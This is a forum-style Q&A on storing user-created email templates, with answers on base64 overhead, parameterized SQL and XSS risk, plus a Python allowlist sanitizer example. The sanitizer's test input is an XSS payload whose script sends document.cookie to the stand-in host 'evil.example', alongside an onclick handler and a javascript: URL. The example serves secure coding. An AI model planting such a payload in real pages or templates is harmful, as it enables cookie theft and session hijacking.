storing email text based templates as base64_encode and storing in database

Alex Lord

So I am creating a basic form to allow users to create text-based email templates. It does include files and images, but only in the format of links which direct the user to the file, so it is still text.

I need to store this in a database, which I have done. I am wondering, is this the best practice? I am using CKEDITOR too.

Or is there a better way?
This sounds OK to me.

I'm doing something similar to this but using TinyMCE and raw output, using the template option that can be embedded inside the text editor.

In my case I'm creating some ready-to-use templates for the user, so the user only needs to select the appropriate template from a list.
Those templates are html/php files loaded inside the editor, so nothing is saved in the DB.
David Favor, Fractional CTO
Distinguished Expert 2018

I'm guessing you're using base64 to save a little space.

You can accomplish the same space saving by just using row compressions, which will leave your data in human readable form.

And as lenamtl said, what you're doing will work too.

My preference is to use row compression, so data can be pulled out + used, without doing a base64 decrypt first.

Base64 does not save space. Base64 actually wastes space - it increases overall usage by about 33% on average.

I would suggest not using Base64 at all. The whole point of Base64 encoding is to store binary data using printable characters (which is why it takes up more space - you're trying to fit 256 possible values from one byte into multiple bytes that only have 64 possible values each). It's the equivalent of being asked what your favorite color is and being given the choices of "blue", "green", and "red" - but your favorite color is "cyan", so you pick blue AND green (you've picked multiple colors that, when together, make the original one color).

You can still store it in the database, but either use escaping on the value or use a prepared statement / query to insert the value so you're not opening yourself up to SQL injection.

I'd also HEAVILY caution against any sort of cross-user template usage (e.g. user A creates a template and user B can see it). This is just begging to be abused by a malicious user who injects malicious code into a template. Just because the code can be inserted without SQL injection doesn't mean it's safe. A malicious user could inject some Javascript (e.g. in a <script> tag or an event handler like a click or mousemove), and have it redirect a good user to a bad or malicious site or open them up to XSS (e.g. dump cookies to a remote site and allow session hijacking).

You need to be VERY thorough in validating any input from users. Remember that malicious users don't have to play by the rules. It's easy to bypass any client-side validation and restrictions and simply upload whatever data you want, so you need to actually check the results before allowing them to be used.
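The three points made in the answer above (base64 only adds overhead, insert with a parameterized query instead of string building, and validate the template server-side before any other user can see it) are shown together in the following added example. It is not code from the question or from any of the experts, and it uses Python with SQLite as a stand-in for the asker's PHP/CKEditor setup; the `templates` table schema, the tag/attribute allowlist, the function names and the hostile sample template are all assumptions made for the example.

```python
import base64
import html
import sqlite3
from html.parser import HTMLParser

# Allowlist for a text-based email template: tags, per-tag attributes and URL schemes.
# Anything not listed is removed; event handlers (onclick, onmouseover, ...) are never allowed.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "a", "img", "h1", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
ALLOWED_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br", "img"}
DROP_BODY_TAGS = {"script", "style"}  # the tag and everything inside it is discarded


def base64_overhead(text: str) -> float:
    """Ratio of base64-encoded size to raw UTF-8 size: about 4/3, never below 1."""
    raw = text.encode("utf-8")
    return len(base64.b64encode(raw)) / len(raw)


class TemplateSanitizer(HTMLParser):
    """Rebuilds the template from the allowlist; all text is re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._dropping = None  # set to the tag name while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self._dropping:
            return
        if tag in DROP_BODY_TAGS:
            self._dropping = tag
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown element removed, its text content is kept
        kept = {}
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on* handlers, style, and anything else not allowlisted
            value = value or ""
            if name in ("href", "src") and not value.strip().lower().startswith(ALLOWED_SCHEMES):
                continue  # drops javascript:, data:, vbscript: and scheme-relative URLs
            kept[name] = html.escape(value, quote=True)
        if tag == "img" and "src" not in kept:
            return  # an image without a safe source is dropped entirely
        attr_text = "".join(f' {k}="{v}"' for k, v in kept.items())
        self.out.append(f"<{tag}{attr_text}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self._dropping:
            if tag == self._dropping:
                self._dropping = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(html.escape(data, quote=False))


def sanitize_template(raw_html: str) -> str:
    parser = TemplateSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out)


def open_store() -> sqlite3.Connection:
    """In-memory stand-in for the real templates table (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE templates (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, "
                 "name TEXT NOT NULL, body TEXT NOT NULL)")
    return conn


def save_template(conn, owner: str, name: str, raw_html: str) -> int:
    """Sanitize on the server, then insert with a parameterized query (no string building)."""
    body = sanitize_template(raw_html)
    cur = conn.execute("INSERT INTO templates (owner, name, body) VALUES (?, ?, ?)",
                       (owner, name, body))
    conn.commit()
    return cur.lastrowid


def load_template(conn, owner: str, template_id: int):
    """Templates are scoped to their owner: another user's id yields None."""
    row = conn.execute("SELECT body FROM templates WHERE id = ? AND owner = ?",
                       (template_id, owner)).fetchone()
    return row[0] if row else None


# Constructed hostile input: event handler, <script>, javascript: URL, plus a quote and ampersand.
HOSTILE_TEMPLATE = (
    '<p>Hi {{name}}, see the <a href="https://example.com/file.pdf" onclick="steal()">report</a>.'
    "<script>document.location='https://evil.example/?c='+document.cookie</script>"
    '<img src="javascript:alert(1)"> O\'Brien & Co</p>'
)

if __name__ == "__main__":
    conn = open_store()
    tid = save_template(conn, "alice", "Bob's report mail", HOSTILE_TEMPLATE)
    print(load_template(conn, "alice", tid))    # stripped of the script, handler and bad image
    print(load_template(conn, "mallory", tid))  # None: not her template
    print(round(base64_overhead(HOSTILE_TEMPLATE), 3))
```

The sanitizer is deliberately an allowlist that rebuilds the markup rather than a blocklist that looks for `<script>`: a blocklist has to anticipate every handler attribute and URL scheme, while an allowlist only has to describe what a plain text-plus-links template legitimately needs. The owner check in `load_template` is the cheap way to honour the cross-user caution above; if templates must be shared, run the same sanitizer again at render time so a template that slipped in before the rules were tightened is still cleaned.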
